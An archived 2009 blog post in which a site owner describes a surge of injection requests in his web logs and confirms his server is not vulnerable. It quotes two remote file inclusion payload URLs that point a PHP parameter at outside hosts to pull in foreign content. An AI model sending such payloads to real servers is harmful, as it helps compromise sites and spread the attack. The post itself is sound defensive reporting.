Main Content
Baby Caleb and Fortune City in your web logs? Archive - Originally posted on "The Horse's Mouth" - 2009-01-31 08:26:08 - Graham Ellis
Our web site logs are getting a lot of requests containing "babycaleb" and "fortunecity" ... looking for URLs such as these:
/resources/ex.php4?item=http://babycaleb.fortunecity.co.uk/picture.htm?
/resources/ex.php4?item=http://64.15.67.17/~artatgig/caleb.htm?
and said to be from an Internet Explorer browser (user agent).
Hmmm ... they look like injection attacks to me, where someone is attempting to include his / her content into our pages. And because the requests come from a lot of different places, there's something viral about the attack - so that when it gets in to somewhere, it's not only feeding whatever the content is via that page if it can, but it's also taking over that machine and using it to attack further machines.
I have not looked all that deep, but I have checked that we're not vulnerable to the attack (save that it's using bandwidth - 12,000 requests out of 140,000 to our server yesterday!) and found some other pages - here and here which are safe to visit and will tell you a little more.
Some other articles
G911 - Search Engine Optimisation Has your Twitter feed stopped working? Switching to their new API Google Analytics and the new UK Cookie law Reading Google Analytics results, based on the relative populations of countries Monitoring the success and traffic of your web site Freedom of Information - consideration for web site designers Tuning the web site for sailing on through this year Web site traffic - real users, or just noise? Diluting History Update - Automatic feeds to Twitter What search terms FAIL to bring visitors to our site, when they should? Reaching the right people with your web site How to tweet automatically from a blog Learning to Twitter / what is Twitter? Static mirroring through HTTrack, wget and others Does robots.txt actually work? This article 2000th article - Remember the background and basics Site24x7 prowls uninvited Cooking bodies and URLs Telling Google which country your business trades in Search Engines. Getting the right pages seen. Which country does a search engine think you are located in? Catching up on indexing our resources Our search engine placement is dropping. Search engine placement - long term strategy and success The Melksham train - a button is pushed Implementing an effective site search engine G909 - Spam, Spamming and Spammers No cold sales calls please - but delighted to hear from others! Welcoming genuine forum posters quickly - but turning away off topic advertisers Introducing your product to Well House Consultants - single, personally tuned email please Moving from a warning system to a control system - PHP, forum spammers Sand to Arabia, Coals to Newcastle or Woodburners to Russia Identifying your real customers and keeping them well informed fast Keeping forum and blog comments clean Cold call contacts - preference services and turning off spam sales approaches World Trade Register - Certainly NOT worth 2985 Euros. Twitter Phishing Trips ... and a great new alert service What do the following web sites have in common? Well house is strong - confirmed? The legal considerations of your web presence - revisited Hotlinked images onto adult material sites Email metrics and filtering Websitemediasolution and a goldfish called Carl Johnson Who is Marc Schneider of Multilingual Search Engine Optimization Inc Offers that I can refuse Preventing forum spam - checks at sign up This article From spam to mod_alias - finding resources Marc Schneider is still having email trouble Co-operating to save, yet we dont Comment spam blocked. Please comment via Forums Ive just received an email from myself. Should I be worried? Unexpected visitors to our site Impact Engineering and Backscatter Email metrics More spam - a success story Telephone Preference Service - we're registered Frightening and from-friend viruses and spams OO techniques are hard to teach An apology to Mr Boneparte Information request forms, cleaning up spam Responding to spam G900 - Miscellany Alan Turing - 1912 to 1954 Help to get online in Melksham Friday - Electrician, Food Festival, C++ Course, Rail Group Meeting Looking forward - the next 3000 And now for some posts a bit more technical Questions I have been asked on answering the phone Looking for a career change - Physician to Web Site Designer This article Every cloud has a silver lining Domain Renewal Group Improving searches - from OR to AND? What the customer is looking for - effective training Know to the police Web site - a refresh to improve navigation What is your business latency and potential? Where now for dial-up providers? Targetted Advertising Do NOT follow links or read attachments in these emails 0870 telephone numbers MySQL, Java, PHP and Linux - new technical articles